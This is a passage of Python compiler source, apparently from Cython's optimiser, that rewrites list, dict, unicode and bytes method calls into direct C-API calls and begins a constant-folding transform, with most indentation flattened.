if node.result_is_used:
new_node = new_node.coerce_to(node.type, self.current_env())
return new_node
PyObject_Pop_func_type = PyrexTypes.CFuncType(
PyrexTypes.py_object_type, [
PyrexTypes.CFuncTypeArg("list", PyrexTypes.py_object_type, None),
])
PyObject_PopIndex_func_type = PyrexTypes.CFuncType(
PyrexTypes.py_object_type, [
PyrexTypes.CFuncTypeArg("list", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("index", PyrexTypes.c_long_type, None),
])
def _handle_simple_method_list_pop(self, node, function, args, is_unbound_method):
return self._handle_simple_method_object_pop(
node, function, args, is_unbound_method, is_list=True)
def _handle_simple_method_object_pop(self, node, function, args, is_unbound_method, is_list=False):
"""Optimistic optimisation as X.pop([n]) is almost always
referring to a list.
"""
if not args:
return node
args = args[:]
if is_list:
type_name = 'List'
args[0] = args[0].as_none_safe_node(
"'NoneType' object has no attribute '%s'",
error="PyExc_AttributeError",
format_args=['pop'])
else:
type_name = 'Object'
if len(args) == 1:
return ExprNodes.PythonCapiCallNode(
node.pos, "__Pyx_Py%s_Pop" % type_name,
self.PyObject_Pop_func_type,
args=args,
may_return_none=True,
is_temp=node.is_temp,
utility_code=load_c_utility('pop'),
)
elif len(args) == 2:
index = unwrap_coerced_node(args[1])
if is_list or isinstance(index, ExprNodes.IntNode):
index = index.coerce_to(PyrexTypes.c_py_ssize_t_type, self.current_env())
if index.type.is_int:
widest = PyrexTypes.widest_numeric_type(
index.type, PyrexTypes.c_py_ssize_t_type)
if widest == PyrexTypes.c_py_ssize_t_type:
args[1] = index
return ExprNodes.PythonCapiCallNode(
node.pos, "__Pyx_Py%s_PopIndex" % type_name,
self.PyObject_PopIndex_func_type,
args=args,
may_return_none=True,
is_temp=node.is_temp,
utility_code=load_c_utility("pop_index"),
)
return node
single_param_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_returncode_type, [
PyrexTypes.CFuncTypeArg("obj", PyrexTypes.py_object_type, None),
],
exception_value = "-1")
def _handle_simple_method_list_sort(self, node, function, args, is_unbound_method):
"""Call PyList_Sort() instead of the 0-argument l.sort().
"""
if len(args) != 1:
return node
return self._substitute_method_call(
node, function, "PyList_Sort", self.single_param_func_type,
            'sort', is_unbound_method, args).coerce_to(node.type, self.current_env())
Pyx_PyDict_GetItem_func_type = PyrexTypes.CFuncType(
PyrexTypes.py_object_type, [
PyrexTypes.CFuncTypeArg("dict", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("key", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("default", PyrexTypes.py_object_type, None),
])
def _handle_simple_method_dict_get(self, node, function, args, is_unbound_method):
"""Replace dict.get() by a call to PyDict_GetItem().
"""
if len(args) == 2:
args.append(ExprNodes.NoneNode(node.pos))
elif len(args) != 3:
self._error_wrong_arg_count('dict.get', node, args, "2 or 3")
return node
return self._substitute_method_call(
node, function,
"__Pyx_PyDict_GetItemDefault", self.Pyx_PyDict_GetItem_func_type,
'get', is_unbound_method, args,
may_return_none = True,
utility_code = load_c_utility("dict_getitem_default"))
Pyx_PyDict_SetDefault_func_type = PyrexTypes.CFuncType(
PyrexTypes.py_object_type, [
PyrexTypes.CFuncTypeArg("dict", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("key", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("default", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("is_safe_type", PyrexTypes.c_int_type, None),
])
def _handle_simple_method_dict_setdefault(self, node, function, args, is_unbound_method):
"""Replace dict.setdefault() by calls to PyDict_GetItem() and PyDict_SetItem().
"""
if len(args) == 2:
args.append(ExprNodes.NoneNode(node.pos))
elif len(args) != 3:
self._error_wrong_arg_count('dict.setdefault', node, args, "2 or 3")
return node
key_type = args[1].type
if key_type.is_builtin_type:
is_safe_type = int(key_type.name in
'str bytes unicode float int long bool')
elif key_type is PyrexTypes.py_object_type:
is_safe_type = -1 # don't know
else:
is_safe_type = 0 # definitely not
args.append(ExprNodes.IntNode(
node.pos, value=str(is_safe_type), constant_result=is_safe_type))
return self._substitute_method_call(
node, function,
"__Pyx_PyDict_SetDefault", self.Pyx_PyDict_SetDefault_func_type,
'setdefault', is_unbound_method, args,
may_return_none=True,
utility_code=load_c_utility('dict_setdefault'))
### unicode type methods
PyUnicode_uchar_predicate_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_bint_type, [
PyrexTypes.CFuncTypeArg("uchar", PyrexTypes.c_py_ucs4_type, None),
])
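    # Illustrative example (comment only): for a variable 'c' of C type
    # Py_UCS4, a call such as c.isdigit() or c.isspace() is redirected from
    # the Python unicode method to the C-level character predicate, roughly
    #
    #     c.isdigit()  ->  Py_UNICODE_ISDIGIT(c)
    #
    # with istitle() going through the __Pyx_Py_UNICODE_ISTITLE helper instead.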
def _inject_unicode_predicate(self, node, function, args, is_unbound_method):
if is_unbound_method or len(args) != 1:
return node
ustring = args[0]
if not isinstance(ustring, ExprNodes.CoerceToPyTypeNode) or \
not ustring.arg.type.is_unicode_char:
return node
uchar = ustring.arg
method_name = function.attribute
if method_name == 'istitle':
# istitle() doesn't directly map to Py_UNICODE_ISTITLE()
utility_code = UtilityCode.load_cached(
"py_unicode_istitle", "StringTools.c")
function_name = '__Pyx_Py_UNICODE_ISTITLE'
else:
utility_code = None
function_name = 'Py_UNICODE_%s' % method_name.upper()
func_call = self._substitute_method_call(
node, function,
function_name, self.PyUnicode_uchar_predicate_func_type,
method_name, is_unbound_method, [uchar],
utility_code = utility_code)
if node.type.is_pyobject:
            func_call = func_call.coerce_to_pyobject(self.current_env())
return func_call
_handle_simple_method_unicode_isalnum = _inject_unicode_predicate
_handle_simple_method_unicode_isalpha = _inject_unicode_predicate
_handle_simple_method_unicode_isdecimal = _inject_unicode_predicate
_handle_simple_method_unicode_isdigit = _inject_unicode_predicate
_handle_simple_method_unicode_islower = _inject_unicode_predicate
_handle_simple_method_unicode_isnumeric = _inject_unicode_predicate
_handle_simple_method_unicode_isspace = _inject_unicode_predicate
_handle_simple_method_unicode_istitle = _inject_unicode_predicate
_handle_simple_method_unicode_isupper = _inject_unicode_predicate
PyUnicode_uchar_conversion_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_py_ucs4_type, [
PyrexTypes.CFuncTypeArg("uchar", PyrexTypes.c_py_ucs4_type, None),
])
def _inject_unicode_character_conversion(self, node, function, args, is_unbound_method):
if is_unbound_method or len(args) != 1:
return node
ustring = args[0]
if not isinstance(ustring, ExprNodes.CoerceToPyTypeNode) or \
not ustring.arg.type.is_unicode_char:
return node
uchar = ustring.arg
method_name = function.attribute
function_name = 'Py_UNICODE_TO%s' % method_name.upper()
func_call = self._substitute_method_call(
node, function,
function_name, self.PyUnicode_uchar_conversion_func_type,
method_name, is_unbound_method, [uchar])
if node.type.is_pyobject:
            func_call = func_call.coerce_to_pyobject(self.current_env())
return func_call
_handle_simple_method_unicode_lower = _inject_unicode_character_conversion
_handle_simple_method_unicode_upper = _inject_unicode_character_conversion
_handle_simple_method_unicode_title = _inject_unicode_character_conversion
PyUnicode_Splitlines_func_type = PyrexTypes.CFuncType(
Builtin.list_type, [
PyrexTypes.CFuncTypeArg("str", Builtin.unicode_type, None),
PyrexTypes.CFuncTypeArg("keepends", PyrexTypes.c_bint_type, None),
])
def _handle_simple_method_unicode_splitlines(self, node, function, args, is_unbound_method):
"""Replace unicode.splitlines(...) by a direct call to the
corresponding C-API function.
"""
if len(args) not in (1,2):
self._error_wrong_arg_count('unicode.splitlines', node, args, "1 or 2")
return node
self._inject_bint_default_argument(node, args, 1, False)
return self._substitute_method_call(
node, function,
"PyUnicode_Splitlines", self.PyUnicode_Splitlines_func_type,
'splitlines', is_unbound_method, args)
PyUnicode_Split_func_type = PyrexTypes.CFuncType(
Builtin.list_type, [
PyrexTypes.CFuncTypeArg("str", Builtin.unicode_type, None),
PyrexTypes.CFuncTypeArg("sep", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("maxsplit", PyrexTypes.c_py_ssize_t_type, None),
]
)
def _handle_simple_method_unicode_split(self, node, function, args, is_unbound_method):
"""Replace unicode.split(...) by a direct call to the
corresponding C-API function.
"""
if len(args) not in (1,2,3):
self._error_wrong_arg_count('unicode.split', node, args, "1-3")
return node
if len(args) < 2:
args.append(ExprNodes.NullNode(node.pos))
self._inject_int_default_argument(
node, args, 2, PyrexTypes.c_py_ssize_t_type, "-1")
return self._substitute_method_call(
node, function,
"PyUnicode_Split", self.PyUnicode_Split_func_type,
'split', is_unbound_method, args)
PyString_Tailmatch_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_bint_type, [
PyrexTypes.CFuncTypeArg("str", PyrexTypes.py_object_type, None), # bytes/str/unicode
PyrexTypes.CFuncTypeArg("substring", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("start", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("end", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("direction", PyrexTypes.c_int_type, None),
],
exception_value = '-1')
def _handle_simple_method_unicode_endswith(self, node, function, args, is_unbound_method):
return self._inject_tailmatch(
node, function, args, is_unbound_method, 'unicode', 'endswith',
unicode_tailmatch_utility_code, +1)
def _handle_simple_method_unicode_startswith(self, node, function, args, is_unbound_method):
return self._inject_tailmatch(
node, function, args, is_unbound_method, 'unicode', 'startswith',
unicode_tailmatch_utility_code, -1)
def _inject_tailmatch(self, node, function, args, is_unbound_method, type_name,
method_name, utility_code, direction):
"""Replace unicode.startswith(...) and unicode.endswith(...)
by a direct call to the corresponding C-API function.
"""
if len(args) not in (2,3,4):
self._error_wrong_arg_count('%s.%s' % (type_name, method_name), node, args, "2-4")
return node
self._inject_int_default_argument(
node, args, 2, PyrexTypes.c_py_ssize_t_type, "0")
self._inject_int_default_argument(
node, args, 3, PyrexTypes.c_py_ssize_t_type, "PY_SSIZE_T_MAX")
args.append(ExprNodes.IntNode(
node.pos, value=str(direction), type=PyrexTypes.c_int_type))
method_call = self._substitute_method_call(
node, function,
"__Pyx_Py%s_Tailmatch" % type_name.capitalize(),
self.PyString_Tailmatch_func_type,
method_name, is_unbound_method, args,
utility_code = utility_code)
return method_call.coerce_to(Builtin.bool_type, self.current_env())
PyUnicode_Find_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_py_ssize_t_type, [
PyrexTypes.CFuncTypeArg("str", Builtin.unicode_type, None),
PyrexTypes.CFuncTypeArg("substring", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("start", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("end", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("direction", PyrexTypes.c_int_type, None),
],
exception_value = '-2')
def _handle_simple_method_unicode_find(self, node, function, args, is_unbound_method):
return self._inject_unicode_find(
node, function, args, is_unbound_method, 'find', +1)
def _handle_simple_method_unicode_rfind(self, node, function, args, is_unbound_method):
return self._inject_unicode_find(
node, function, args, is_unbound_method, 'rfind', -1)
def _inject_unicode_find(self, node, function, args, is_unbound_method,
method_name, direction):
"""Replace unicode.find(...) and unicode.rfind(...) by a
direct call to the corresponding C-API function.
"""
if len(args) not in (2,3,4):
self._error_wrong_arg_count('unicode.%s' % method_name, node, args, "2-4")
return node
self._inject_int_default_argument(
node, args, 2, PyrexTypes.c_py_ssize_t_type, "0")
self._inject_int_default_argument(
node, args, 3, PyrexTypes.c_py_ssize_t_type, "PY_SSIZE_T_MAX")
args.append(ExprNodes.IntNode(
node.pos, value=str(direction), type=PyrexTypes.c_int_type))
method_call = self._substitute_method_call(
node, function, "PyUnicode_Find", self.PyUnicode_Find_func_type,
method_name, is_unbound_method, args)
return method_call.coerce_to_pyobject(self.current_env())
PyUnicode_Count_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_py_ssize_t_type, [
PyrexTypes.CFuncTypeArg("str", Builtin.unicode_type, None),
PyrexTypes.CFuncTypeArg("substring", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("start", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("end", PyrexTypes.c_py_ssize_t_type, None),
],
exception_value = '-1')
def _handle_simple_method_unicode_count(self, node, function, args, is_unbound_method):
"""Replace unicode.count(...) by a direct call to the
corresponding C-API function.
"""
if len(args) not in (2,3,4):
self._error_wrong_arg_count('unicode.count', node, args, "2-4")
return node
self._inject_int_default_argument(
node, args, 2, PyrexTypes.c_py_ssize_t_type, "0")
self._inject_int_default_argument(
node, args, 3, PyrexTypes.c_py_ssize_t_type, "PY_SSIZE_T_MAX")
method_call = self._substitute_method_call(
node, function, "PyUnicode_Count", self.PyUnicode_Count_func_type,
'count', is_unbound_method, args)
return method_call.coerce_to_pyobject(self.current_env())
PyUnicode_Replace_func_type = PyrexTypes.CFuncType(
Builtin.unicode_type, [
PyrexTypes.CFuncTypeArg("str", Builtin.unicode_type, None),
PyrexTypes.CFuncTypeArg("substring", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("replstr", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("maxcount", PyrexTypes.c_py_ssize_t_type, None),
])
def _handle_simple_method_unicode_replace(self, node, function, args, is_unbound_method):
"""Replace unicode.replace(...) by a direct call to the
corresponding C-API function.
"""
if len(args) not in (3,4):
self._error_wrong_arg_count('unicode.replace', node, args, "3-4")
return node
self._inject_int_default_argument(
node, args, 3, PyrexTypes.c_py_ssize_t_type, "-1")
return self._substitute_method_call(
node, function, "PyUnicode_Replace", self.PyUnicode_Replace_func_type,
'replace', is_unbound_method, args)
PyUnicode_AsEncodedString_func_type = PyrexTypes.CFuncType(
Builtin.bytes_type, [
PyrexTypes.CFuncTypeArg("obj", Builtin.unicode_type, None),
PyrexTypes.CFuncTypeArg("encoding", PyrexTypes.c_char_ptr_type, None),
PyrexTypes.CFuncTypeArg("errors", PyrexTypes.c_char_ptr_type, None),
])
PyUnicode_AsXyzString_func_type = PyrexTypes.CFuncType(
Builtin.bytes_type, [
PyrexTypes.CFuncTypeArg("obj", Builtin.unicode_type, None),
])
_special_encodings = ['UTF8', 'UTF16', 'Latin1', 'ASCII',
'unicode_escape', 'raw_unicode_escape']
_special_codecs = [ (name, codecs.getencoder(name))
for name in _special_encodings ]
def _handle_simple_method_unicode_encode(self, node, function, args, is_unbound_method):
"""Replace unicode.encode(...) by a direct C-API call to the
corresponding codec.
"""
if len(args) < 1 or len(args) > 3:
self._error_wrong_arg_count('unicode.encode', node, args, '1-3')
return node
string_node = args[0]
if len(args) == 1:
null_node = ExprNodes.NullNode(node.pos)
return self._substitute_method_call(
node, function, "PyUnicode_AsEncodedString",
self.PyUnicode_AsEncodedString_func_type,
'encode', is_unbound_method, [string_node, null_node, null_node])
parameters = self._unpack_encoding_and_error_mode(node.pos, args)
if parameters is None:
return node
encoding, encoding_node, error_handling, error_handling_node = parameters
if encoding and isinstance(string_node, ExprNodes.UnicodeNode):
# constant, so try to do the encoding at compile time
try:
value = string_node.value.encode(encoding, error_handling)
except:
# well, looks like we can't
pass
else:
value = BytesLiteral(value)
value.encoding = encoding
return ExprNodes.BytesNode(
string_node.pos, value=value, type=Builtin.bytes_type)
if encoding and error_handling == 'strict':
# try to find a specific encoder function
codec_name = self._find_special_codec_name(encoding)
if codec_name is not None:
encode_function = "PyUnicode_As%sString" % codec_name
return self._substitute_method_call(
node, function, encode_function,
self.PyUnicode_AsXyzString_func_type,
'encode', is_unbound_method, [string_node])
return self._substitute_method_call(
node, function, "PyUnicode_AsEncodedString",
self.PyUnicode_AsEncodedString_func_type,
'encode', is_unbound_method,
[string_node, encoding_node, error_handling_node])
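    # Example, added for clarity: a constant like u"abc".encode("utf8") is
    # encoded at compile time into a bytes literal; a non-constant
    # s.encode("utf8") with the default 'strict' error handling should map to
    # PyUnicode_AsUTF8String(s), and other encodings fall back to
    # PyUnicode_AsEncodedString(s, encoding, errors).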
PyUnicode_DecodeXyz_func_ptr_type = PyrexTypes.CPtrType(PyrexTypes.CFuncType(
Builtin.unicode_type, [
PyrexTypes.CFuncTypeArg("string", PyrexTypes.c_char_ptr_type, None),
PyrexTypes.CFuncTypeArg("size", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("errors", PyrexTypes.c_char_ptr_type, None),
]))
_decode_c_string_func_type = PyrexTypes.CFuncType(
Builtin.unicode_type, [
PyrexTypes.CFuncTypeArg("string", PyrexTypes.c_char_ptr_type, None),
PyrexTypes.CFuncTypeArg("start", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("stop", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("encoding", PyrexTypes.c_char_ptr_type, None),
PyrexTypes.CFuncTypeArg("errors", PyrexTypes.c_char_ptr_type, None),
PyrexTypes.CFuncTypeArg("decode_func", PyUnicode_DecodeXyz_func_ptr_type, None),
])
_decode_bytes_func_type = PyrexTypes.CFuncType(
Builtin.unicode_type, [
PyrexTypes.CFuncTypeArg("string", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("start", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("stop", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("encoding", PyrexTypes.c_char_ptr_type, None),
PyrexTypes.CFuncTypeArg("errors", PyrexTypes.c_char_ptr_type, None),
PyrexTypes.CFuncTypeArg("decode_func", PyUnicode_DecodeXyz_func_ptr_type, None),
])
_decode_cpp_string_func_type = None # lazy init
def _handle_simple_method_bytes_decode(self, node, function, args, is_unbound_method):
"""Replace char*.decode() by a direct C-API call to the
corresponding codec, possibly resolving a slice on the char*.
"""
if not (1 <= len(args) <= 3):
self._error_wrong_arg_count('bytes.decode', node, args, '1-3')
return node
# normalise input nodes
string_node = args[0]
start = stop = None
if isinstance(string_node, ExprNodes.SliceIndexNode):
index_node = string_node
string_node = index_node.base
start, stop = index_node.start, index_node.stop
if not start or start.constant_result == 0:
start = None
if isinstance(string_node, ExprNodes.CoerceToPyTypeNode):
string_node = string_node.arg
string_type = string_node.type
if string_type in (Builtin.bytes_type, Builtin.bytearray_type):
if is_unbound_method:
string_node = string_node.as_none_safe_node(
"descriptor '%s' requires a '%s' object but received a 'NoneType'",
format_args=['decode', string_type.name])
else:
string_node = string_node.as_none_safe_node(
"'NoneType' object has no attribute '%s'",
error="PyExc_AttributeError",
format_args=['decode'])
elif not string_type.is_string and not string_type.is_cpp_string:
# nothing to optimise here
return node
parameters = self._unpack_encoding_and_error_mode(node.pos, args)
if parameters is None:
return node
encoding, encoding_node, error_handling, error_handling_node = parameters
if not start:
start = ExprNodes.IntNode(node.pos, value='0', constant_result=0)
elif not start.type.is_int:
start = start.coerce_to(PyrexTypes.c_py_ssize_t_type, self.current_env())
if stop and not stop.type.is_int:
stop = stop.coerce_to(PyrexTypes.c_py_ssize_t_type, self.current_env())
# try to find a specific encoder function
codec_name = None
if encoding is not None:
codec_name = self._find_special_codec_name(encoding)
if codec_name is not None:
decode_function = ExprNodes.RawCNameExprNode(
node.pos, type=self.PyUnicode_DecodeXyz_func_ptr_type,
cname="PyUnicode_Decode%s" % codec_name)
encoding_node = ExprNodes.NullNode(node.pos)
else:
decode_function = ExprNodes.NullNode(node.pos)
# build the helper function call
temps = []
if string_type.is_string:
# C string
if not stop:
# use strlen() to find the string length, just as CPython would
if not string_node.is_name:
string_node = UtilNodes.LetRefNode(string_node) # used twice
temps.append(string_node)
stop = ExprNodes.PythonCapiCallNode(
string_node.pos, "strlen", self.Pyx_strlen_func_type,
args=[string_node],
is_temp=False,
utility_code=UtilityCode.load_cached("IncludeStringH", "StringTools.c"),
).coerce_to(PyrexTypes.c_py_ssize_t_type, self.current_env())
helper_func_type = self._decode_c_string_func_type
utility_code_name = 'decode_c_string'
elif string_type.is_cpp_string:
# C++ std::string
if not stop:
stop = ExprNodes.IntNode(node.pos, value='PY_SSIZE_T_MAX',
constant_result=ExprNodes.not_a_constant)
if self._decode_cpp_string_func_type is None:
# lazy init to reuse the C++ string type
self._decode_cpp_string_func_type = PyrexTypes.CFuncType(
Builtin.unicode_type, [
PyrexTypes.CFuncTypeArg("string", string_type, None),
PyrexTypes.CFuncTypeArg("start", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("stop", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("encoding", PyrexTypes.c_char_ptr_type, None),
PyrexTypes.CFuncTypeArg("errors", PyrexTypes.c_char_ptr_type, None),
PyrexTypes.CFuncTypeArg("decode_func", self.PyUnicode_DecodeXyz_func_ptr_type, None),
])
helper_func_type = self._decode_cpp_string_func_type
utility_code_name = 'decode_cpp_string'
else:
# Python bytes/bytearray object
if not stop:
stop = ExprNodes.IntNode(node.pos, value='PY_SSIZE_T_MAX',
constant_result=ExprNodes.not_a_constant)
helper_func_type = self._decode_bytes_func_type
if string_type is Builtin.bytes_type:
utility_code_name = 'decode_bytes'
else:
utility_code_name = 'decode_bytearray'
node = ExprNodes.PythonCapiCallNode(
node.pos, '__Pyx_%s' % utility_code_name, helper_func_type,
args=[string_node, start, stop, encoding_node, error_handling_node, decode_function],
is_temp=node.is_temp,
utility_code=UtilityCode.load_cached(utility_code_name, 'StringTools.c'),
)
for temp in temps[::-1]:
node = UtilNodes.EvalWithTempExprNode(temp, node)
return node
_handle_simple_method_bytearray_decode = _handle_simple_method_bytes_decode
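    # Illustrative note (added): for a plain char* value, cstr.decode('utf8')
    # goes through the __Pyx_decode_c_string() helper; when no slice stop is
    # given, strlen() supplies the length, as the comment above notes CPython
    # would do.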
def _find_special_codec_name(self, encoding):
try:
requested_codec = codecs.getencoder(encoding)
except LookupError:
return None
for name, codec in self._special_codecs:
if codec == requested_codec:
if '_' in name:
name = ''.join([s.capitalize()
for s in name.split('_')])
return name
return None
def _unpack_encoding_and_error_mode(self, pos, args):
null_node = ExprNodes.NullNode(pos)
if len(args) >= 2:
encoding, encoding_node = self._unpack_string_and_cstring_node(args[1])
if encoding_node is None:
return None
else:
encoding = None
encoding_node = null_node
if len(args) == 3:
error_handling, error_handling_node = self._unpack_string_and_cstring_node(args[2])
if error_handling_node is None:
return None
if error_handling == 'strict':
error_handling_node = null_node
else:
error_handling = 'strict'
error_handling_node = null_node
return (encoding, encoding_node, error_handling, error_handling_node)
def _unpack_string_and_cstring_node(self, node):
if isinstance(node, ExprNodes.CoerceToPyTypeNode):
node = node.arg
if isinstance(node, ExprNodes.UnicodeNode):
encoding = node.value
node = ExprNodes.BytesNode(
node.pos, value=BytesLiteral(encoding.utf8encode()),
type=PyrexTypes.c_char_ptr_type)
elif isinstance(node, (ExprNodes.StringNode, ExprNodes.BytesNode)):
encoding = node.value.decode('ISO-8859-1')
node = ExprNodes.BytesNode(
node.pos, value=node.value, type=PyrexTypes.c_char_ptr_type)
elif node.type is Builtin.bytes_type:
encoding = None
node = node.coerce_to(PyrexTypes.c_char_ptr_type, self.current_env())
elif node.type.is_string:
encoding = None
else:
encoding = node = None
return encoding, node
def _handle_simple_method_str_endswith(self, node, function, args, is_unbound_method):
return self._inject_tailmatch(
node, function, args, is_unbound_method, 'str', 'endswith',
str_tailmatch_utility_code, +1)
def _handle_simple_method_str_startswith(self, node, function, args, is_unbound_method):
return self._inject_tailmatch(
node, function, args, is_unbound_method, 'str', 'startswith',
str_tailmatch_utility_code, -1)
def _handle_simple_method_bytes_endswith(self, node, function, args, is_unbound_method):
return self._inject_tailmatch(
node, function, args, is_unbound_method, 'bytes', 'endswith',
bytes_tailmatch_utility_code, +1)
def _handle_simple_method_bytes_startswith(self, node, function, args, is_unbound_method):
return self._inject_tailmatch(
node, function, args, is_unbound_method, 'bytes', 'startswith',
bytes_tailmatch_utility_code, -1)
''' # disabled for now, enable when we consider it worth it (see StringTools.c)
def _handle_simple_method_bytearray_endswith(self, node, function, args, is_unbound_method):
return self._inject_tailmatch(
node, function, args, is_unbound_method, 'bytearray', 'endswith',
bytes_tailmatch_utility_code, +1)
def _handle_simple_method_bytearray_startswith(self, node, function, args, is_unbound_method):
return self._inject_tailmatch(
node, function, args, is_unbound_method, 'bytearray', 'startswith',
bytes_tailmatch_utility_code, -1)
'''
### helpers
def _substitute_method_call(self, node, function, name, func_type,
attr_name, is_unbound_method, args=(),
utility_code=None, is_temp=None,
may_return_none=ExprNodes.PythonCapiCallNode.may_return_none):
args = list(args)
if args and not args[0].is_literal:
self_arg = args[0]
if is_unbound_method:
self_arg = self_arg.as_none_safe_node(
"descriptor '%s' requires a '%s' object but received a 'NoneType'",
format_args=[attr_name, function.obj.name])
else:
self_arg = self_arg.as_none_safe_node(
"'NoneType' object has no attribute '%s'",
error = "PyExc_AttributeError",
format_args = [attr_name])
args[0] = self_arg
if is_temp is None:
is_temp = node.is_temp
return ExprNodes.PythonCapiCallNode(
node.pos, name, func_type,
args = args,
is_temp = is_temp,
utility_code = utility_code,
may_return_none = may_return_none,
result_is_used = node.result_is_used,
)
def _inject_int_default_argument(self, node, args, arg_index, type, default_value):
assert len(args) >= arg_index
if len(args) == arg_index:
args.append(ExprNodes.IntNode(node.pos, value=str(default_value),
type=type, constant_result=default_value))
else:
args[arg_index] = args[arg_index].coerce_to(type, self.current_env())
def _inject_bint_default_argument(self, node, args, arg_index, default_value):
assert len(args) >= arg_index
if len(args) == arg_index:
default_value = bool(default_value)
args.append(ExprNodes.BoolNode(node.pos, value=default_value,
constant_result=default_value))
else:
args[arg_index] = args[arg_index].coerce_to_boolean(self.current_env())
unicode_tailmatch_utility_code = UtilityCode.load_cached('unicode_tailmatch', 'StringTools.c')
bytes_tailmatch_utility_code = UtilityCode.load_cached('bytes_tailmatch', 'StringTools.c')
str_tailmatch_utility_code = UtilityCode.load_cached('str_tailmatch', 'StringTools.c')
class ConstantFolding(Visitor.VisitorTransform, SkipDeclarations):
"""Calculate the result of constant expressions to store it in
``expr_node.constant_result``, and replace trivial cases by their
constant result.
General rules:
- We calculate float constants to make them available to the
compiler, but we do not aggregate them into a single literal
node to prevent any loss of precision.
- We recursively calculate constants from non-literal nodes to
make them available to the compiler, but we only aggregate
literal nodes at each step. Non-literal nodes are never merged
into a single node.
"""
def __init__(self, reevaluate=False):
"""
The reevaluate argument specifies whether constant values that were
previously computed should be recomputed.
"""
super(ConstantFolding, self).__init__()
self.reevaluate = reevaluate
def _calculate_const(self, node):
if (not self.reevaluate and
node.constant_result is not ExprNodes.constant_value_not_set):
return
# make sure we always set the value
not_a_constant = ExprNodes.not_a_constant
node.constant_result = not_a_constant
# check if all children are constant
children = self.visitchildren(node)
for child_result in children.values():
if type(child_result) is list:
for child in child_result:
if getattr(child, 'constant_result', not_a_constant) is not_a_constant:
return
elif getattr(child_result, 'constant_result', not_a_constant) is not_a_constant:
return
# now try to calculate the real constant value
try:
node.calculate_constant_result()
# if node.constant_result is not ExprNodes.not_a_constant:
# print node.__class__.__name__, node.constant_result
except (ValueError, TypeError, KeyError, IndexError, AttributeError, ArithmeticError):
# ignore all 'normal' errors here => no constant result
pass
except Exception:
# this looks like a real error
import traceback, sys
traceback.print_exc(file=sys.stdout)
NODE_TYPE_ORDER = [ExprNodes.BoolNode, ExprNodes.CharNode,
ExprNodes.IntNode, ExprNodes.FloatNode]
def _widest_node_class(self, *nodes):
try:
return self.NODE_TYPE_ORDER[
max(map(self.NODE_TYPE_ORDER.index, map(type, nodes)))]
except ValueError:
return None
def _bool_node(self, node, value):
value = bool(value)
return ExprNodes.BoolNode(node.pos, value=value, constant_result=value)
def visit_ExprNode(self, node):
self._calculate_const(node)
return node
def visit_UnopNode(self, node):
self._calculate_const(node)
if not node.has_constant_result():
if node.operator == '!':
return self._handle_NotNode(node)
return node
if not node.operand.is_literal:
return node
if node.operator == '!':
return self._bool_node(node, node.constant_result)
elif isinstance(node.operand, ExprNodes.BoolNode):
return ExprNodes.IntNode(node.pos, value=str(int(node.constant_result)),
type=PyrexTypes.c_int_type,
constant_result=int(node.constant_result))
elif node.operator == '+':
return self._handle_UnaryPlusNode(node)
elif node.operator == '-':
return self._handle_UnaryMinusNode(node)
return node
_negate_operator = {
'in': 'not_in',
'not_in': 'in',
'is': 'is_not',
'is_not': 'is'
}.get
def _handle_NotNode(self, node):
operand = node.operand
if isinstance(operand, ExprNodes.PrimaryCmpNode):
operator = self._negate_operator(operand.operator)
if operator:
node = copy.copy(operand)
node.operator = operator
node = self.visit_PrimaryCmpNode(node)
return node
def _handle_UnaryMinusNode(self, node):
def _negate(value):
if value.startswith('-'):
value = value[1:]
else:
value = '-' + value
return value
node_type = node.operand.type
if isinstance(node.operand, ExprNodes.FloatNode):
# this is a safe operation
return ExprNodes.FloatNode(node.pos, value=_negate(node.operand.value),
type=node_type,
constant_result=node.constant_result)
if node_type.is_int and node_type.signed or \
isinstance(node.operand, ExprNodes.IntNode) and node_type.is_pyobject:
return ExprNodes.IntNode(node.pos, value=_negate(node.operand.value),
type=node_type,
longness=node.operand.longness,
constant_result=node.constant_result)
return node
def _handle_UnaryPlusNode(self, node):
if (node.operand.has_constant_result() and
node.constant_result == node.operand.constant_result):
return node.operand
return node
def visit_BoolBinopNode(self, node):
self._calculate_const(node)
if not node.operand1.has_constant_result():
return node
if node.operand1.constant_result:
if node.operator == 'and':
return node.operand2
else:
return node.operand1
else:
if node.operator == 'and':
return node.operand1
else:
return node.operand2
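    # Example (added for clarity): when the first operand is a constant,
    # 'True and x' simplifies to 'x' and '0 or y' simplifies to 'y'; nothing
    # changes if operand1 is unknown at compile time.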
def visit_BinopNode(self, node):
self._calculate_const(node)
if node.constant_result is ExprNodes.not_a_constant:
